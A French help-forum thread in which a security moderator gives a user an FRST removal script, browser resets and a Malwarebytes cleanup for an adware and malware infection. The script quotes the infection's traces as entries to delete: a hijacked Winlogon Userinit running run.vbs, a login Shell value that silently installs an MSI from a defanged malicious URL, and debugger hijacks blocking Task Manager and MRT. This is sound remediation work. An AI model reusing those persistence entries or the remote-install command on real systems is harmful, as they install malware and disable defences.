Probleme du fichier run.vbs manquant - demande d'aide FRST
Fermé
Nikhil69
Messages postés
1
Date d'inscription
jeudi 11 janvier 2018
Statut
Membre
Dernière intervention
11 janvier 2018
-
11 janv. 2018 à 12:28
Nikhil69 - 11 janv. 2018 à 17:08
Nikhil69 - 11 janv. 2018 à 17:08
A voir également:
- Probleme du fichier run.vbs manquant - demande d'aide FRST
- Fichier rar - Guide
- Fichier host - Guide
- Fichier iso - Guide
- Comment réduire la taille d'un fichier - Guide
- Ouvrir fichier .bin - Guide
1 réponse
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 629
11 janv. 2018 à 12:36
11 janv. 2018 à 12:36
Salut,
Y a du boulot, en plus Windows 10 n'est pas à jour.
Tu as des programmes qui ont été installés à l'achat de l'ordinateur ou installés par la suite et qui sont pas forcément utiles.
Ils encombrent Windows et peuvent le ralentir.
Tu peux donc les désinstaller.
Vas dans le Panneau de configuration
puis programmes et fonctionnalités.
Désinstalle :
CyberLink
Dropbox
McAfee Security Scan Plus
MEGAsync
WildTangent Games
PS : CCleaner n'est pas vraiment utile, même si on le recommande de partout.
Désactive la surveillance de CCleaner, inutile, ça se met au démarrage de Windows et le ralentit avec ces nettoyages incessants, voir : https://www.malekal.com/supprimer-ccleaner-demarrage-windows/
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.
Enregistre le contenu par le menu fichier puis enregistrer.
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, si tu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
Y a du boulot, en plus Windows 10 n'est pas à jour.
Tu as des programmes qui ont été installés à l'achat de l'ordinateur ou installés par la suite et qui sont pas forcément utiles.
Ils encombrent Windows et peuvent le ralentir.
Tu peux donc les désinstaller.
Vas dans le Panneau de configuration
puis programmes et fonctionnalités.
Désinstalle :
CyberLink
Dropbox
McAfee Security Scan Plus
MEGAsync
WildTangent Games
PS : CCleaner n'est pas vraiment utile, même si on le recommande de partout.
Désactive la surveillance de CCleaner, inutile, ça se met au démarrage de Windows et le ralentit avec ces nettoyages incessants, voir : https://www.malekal.com/supprimer-ccleaner-demarrage-windows/
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.
CreateRestorePoint:
CloseProcesses:
HKLM\...\Winlogon: [Userinit] wscript C:\WINDOWS\run.vbs,
HKLM-x32\...\Winlogon: [Userinit] wscript C:\WINDOWS\run.vbs,
HKU\S-1-5-21-661583305-3042912117-2407812497-1001\...\Run: [background_fault] => C:\Users\alicia.mena\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) <==== ATTENTION
HKU\S-1-5-21-661583305-3042912117-2407812497-1001\...\Run: [ares] => E:\Ares.exe -h
HKU\S-1-5-21-661583305-3042912117-2407812497-1001\...\RunOnce: [Application Restart #3] => C:\Users\alicia.mena\AppData\Local\SweetLabs App Platform\Engine\ServiceHostApp.exe --disable-internal-flash --noerrdialogs --no-message-box --disable-extensions --disable-web-security --disable-web- (l'élément de données a 595 caractères en plus).
HKU\S-1-5-21-661583305-3042912117-2407812497-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj1XRkEyFdHxF8I5FTQQFdYdNURXNdNXNUJSMdE5OYY8MH== /q <==== ATTENTION [Pays US - 104.28.17.238]
HKLM\...\Providers\5jsohalu: C:\Users\UDPdp\UDPnp4_\local64spl.dll <==== ATTENTION
HKLM\...\Providers\9o0cxa1k: C:\598f0cf2f8d8c087c89e_\local64spl.dll <==== ATTENTION
HKLM\...\Providers\adua0bt0: C:\598f0cf2f8d8c087c89e\\local64spl.dll <==== ATTENTION
HKLM\...\Providers\hiyq94fx: C:\Program Files (x86)\Anerrerentkgupy Verfier\local64spl.dll [291328 2017-01-15] () <==== ATTENTION
HKLM\...\Providers\mp0rcu6q: C:\Users\UDPdp\UDPnp4\\local64spl.dll <==== ATTENTION
HKLM\...\Providers\mxwum3ty: C:\Users\UDPdp\UDPnp4\\local64spl.dll <==== ATTENTION
HKLM\...\Providers\syf9l359: C:\598f0cf2f8d8c087c89e_\local64spl.dll <==== ATTENTION
HKLM\...\Providers\w3c4cud8: C:\Users\UDPdp\UDPnp4_\local64spl.dll <==== ATTENTION
HKLM\...\Providers\xs6yb0hn: C:\598f0cf2f8d8c087c89e\\local64spl.dll <==== ATTENTION
AppInit_DLLs-x32: C:\ProgramData\Zaamla\Viacom.dll => Pas de fichier
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\MRT.exe: [Debugger] C:\WINDOWS\TEMP\ouaF946.tmp\secondu71\Gubed.exe -Yrrehs
IFEO\taskmgr.exe: [Debugger]
2018-01-09 19:29 - 2017-01-22 13:10 - 000003522 _____ C:\WINDOWS\System32\Tasks\UCBrowserUpdater
2017-08-21 15:40 - 2005-01-19 16:44 - 000140288 _____ ( ) C:\Users\alicia.mena\CursorXP.exe
2017-08-21 15:40 - 2005-01-19 16:44 - 000014848 _____ ( ) C:\Users\alicia.mena\CurXP0.dll
2017-04-17 17:55 - 2005-01-19 16:44 - 000275968 _____ ( ) C:\Users\alicia.mena\CurXP1.dll
2017-08-21 15:40 - 2005-01-19 16:44 - 000205824 _____ ( ) C:\Users\alicia.mena\CurXPCpl.dll
2017-04-17 17:55 - 2005-01-19 16:44 - 000059392 _____ ( ) C:\Users\alicia.mena\CurXPCpl.exe
2017-08-21 15:40 - 2005-01-19 16:43 - 000094720 _____ ( ) C:\Users\alicia.mena\CurXPUtil.exe
2017-08-21 16:49 - 2017-08-21 16:49 - 000102400 _____ (Info-ZIP) C:\Users\alicia.mena\Unzip32.dll
2017-04-17 17:55 - 1999-12-09 10:19 - 000147456 _____ (Info-ZIP) C:\Users\alicia.mena\Zip32.dll
2016-08-17 10:55 - 2016-08-17 10:55 - 007065600 _____ () C:\Program Files (x86)\GUTF023.tmp
2017-01-22 13:06 - 2017-01-22 13:06 - 000278517 _____ () C:\Users\alicia.mena\AppData\Roaming\Konkfax.bin
2017-01-22 13:07 - 2017-01-22 13:07 - 001938535 _____ () C:\Users\alicia.mena\AppData\Roaming\NimStrong.bin
2017-01-22 13:06 - 2017-01-22 13:05 - 000983040 _____ () C:\Users\alicia.mena\AppData\Roaming\Tripplezumfan.exe
2017-01-22 13:06 - 2017-01-22 13:06 - 001908576 _____ () C:\Users\alicia.mena\AppData\Roaming\Tripplezumfan.tst
2017-01-22 13:07 - 2017-01-22 13:07 - 000032038 _____ () C:\Users\alicia.mena\AppData\Roaming\uninstall_temp.ico
2016-12-14 22:16 - 2018-01-02 20:00 - 000007597 _____ () C:\Users\alicia.mena\AppData\Local\Resmon.ResmonCfg
2017-04-08 10:18 - 2017-04-08 10:18 - 000000552 _____ () C:\Users\alicia.mena\AppData\Local\TroubleshooterConfig.json
2016-12-01 17:50 - 2016-12-01 17:50 - 000000000 _____ () C:\Users\alicia.mena\AppData\Local\{B8A55C19-CCAC-4B16-825F-662C3C2C4AEC}
ShellExecuteHooks: Pas de nom - {FF36239E-9EC3-11E6-A21A-64006A5CFC23} - -> Pas de fichier
ShellExecuteHooks: Pas de nom - {09C9B5EC-D3F4-11E6-85AF-64006A5CFC35} - C:\Users\alicia.mena\AppData\Roaming\Lerjsenomick\Merjodom.dll -> Pas de fichier <==== ATTENTION
ShellExecuteHooks: Pas de nom - {036CBE24-DE3B-11E6-95A0-64006A5CFC23} - C:\Users\alicia.mena\AppData\Roaming\Vvuckchvosh\Jujutshnile.dll -> Pas de fichier <==== ATTENTION
R2 Dropboxkwrigfgw; C:\Program Files (x86)\kwrigfgw\Dropboxkwrigfgw.dll [225792 2017-01-22] () [Fichier non signé]
R2 UCBrowserSvc; C:\Program Files (x86)\UCBrowser\Application\UCService.exe [626576 2017-12-11] () <==== ATTENTION
S2 ed2kidle; C:\Program Files (x86)\amuleC1\ed2k.exe -downloadwhenidle [X] <==== ATTENTION
S2 ParetoLogicGUMFtmp; rundll32.exe C:\Program Files (x86)\ParetoLogic\ParetoLogicGUMFtmp.dll,soeasy [X]
R2 zdwfp; C:\WINDOWS\system32\Drivers\zdwfp64.sys [46352 2016-12-14] (zdengine)
R1 ucdrv; C:\WINDOWS\System32\drivers:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== ATTENTION
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
C:\Program Files (x86)\Elex-tech
R1 iSafeNetFilter; C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== ATTENTION
2018-01-10 10:19 - 2018-01-10 10:19 - 000003476 _____ C:\WINDOWS\System32\Tasks\UCBrowserSecureUpdater
2018-01-10 10:02 - 2018-01-10 10:00 - 008198432 _____ (Malwarebytes) C:\Users\alicia.mena\Desktop\adwcleaner_7.0.6.0.exe
EmptyTemp:
RemoveProxy:
Reboot:
Enregistre le contenu par le menu fichier puis enregistrer.
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, si tu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
11 janv. 2018 à 17:08
Une belle soirée à toi,